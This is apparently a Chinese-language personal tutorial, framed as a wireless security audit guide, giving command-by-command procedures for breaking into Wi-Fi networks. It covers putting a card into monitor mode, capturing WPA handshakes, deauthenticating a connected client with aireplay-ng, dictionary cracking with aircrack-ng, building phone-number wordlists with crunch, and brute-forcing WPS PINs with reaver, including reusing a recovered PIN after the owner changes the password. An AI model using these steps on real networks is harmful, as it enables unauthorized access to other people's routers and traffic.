无线网络安全审计工具
SenZyo目录
总结
- 事实上利用字典穷举完全靠运气。
- 通过爆破WPS可行性高但reaver总报错:
[!] WPS transaction failed (code: 0x04), re-trying last pin, 解决方法并没有效果。
1 aircrack-ng
通过抓取握手包后将其破解以获取密码。
1.1 准备
1.1.1 硬件
网卡芯片需要支持监听和注入, 此处用的芯片是RTL8187L。
1.1.2 软件
安装aircrack-ng:
apt install aircrack-ng查看网卡状态信息:
iwconfig关闭网卡
wlx012345678:ip link set wlx012345678 down重命名网卡
wlx012345678为wl:ip link set wlx012345678 name wl打开网卡
wl:ip link set wl up
1.2 监听
为网卡
wl开启监听模式:airmon-ng start wl查看网卡状态信息:
iwconfig发现网卡
wl变成了wlmon监听附近Wi-Fi:
airodump-ng wlmon
1.3 抓包
airodump-ng --channel 7 -w captured --bssid XX:XX:XX:XX:XX:XX wlmon1.4 攻击
aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX -c 3C:CD:5D:93:A7:08 wlmon1.5 破解
关闭监听模式:
airmon-ng stop wlmon使用字典进行暴力破解:
aircrack-ng -w 桌面/dic.txt 桌面/captured-01.cap
2 crunch
用来制作字典, 参考crunch命令详解以及使用方法。
2.1 安装
apt install crunch2.2 例子
生成8位数密码, 只包含数字:
crunch 8 8 -f /usr/share/crunch/charset.lst numeric -o num8.txt生成11位手机号:
crunch 11 11 +0123456789 -t 134%%%%%%%% -o phone134.txt
| 普通用户号段 | 中国移动 | 中国联通 | 中国电信 |
|---|---|---|---|
| 13号段 | 134、135、136、137、138、139 | 130、131、132 | 133 |
| 14号段 | 147 | 145 | 149 |
| 15号段 | 150、151、152、157、158、159 | 155、156 | 153 |
| 16号段 | 166 | ||
| 17号段 | 172、178 | 171、175、176 | 173、177 |
| 18号段 | 182、183、184、187、188 | 185、186 | 180、181、189 |
| 19号段 | 195、197、198 | 196 | 190、191、193、199 |
还可以设置为每次生成的文件大小为20M:
crunch 11 11 +0123456789 -t 134%%%%%%%% -b 20mib -o START 3 reaver
通过爆破WPS的PIN来达到目的。
为网卡
wl开启监听模式:airmon-ng start wl监听附近Wi-Fi:
airodump-ng wlmon找出开启了WPS功能、可以使用PIN登录的路由器:
wash -i wlmonENC需要为WPA或WPA2, AUTH需要为PSK
攻击:
reaver -i wlmon -c 7 -b XX:XX:XX:XX:XX:XX -S -d 9 -t 9 -vv获取到PIN后, 以后即便路由器更换了密码, 也可以很迅速地通过PIN重新获得新密码。举例:
reaver -i wlmon -b xx:xx:xx:xx:xx:xx -p 12345670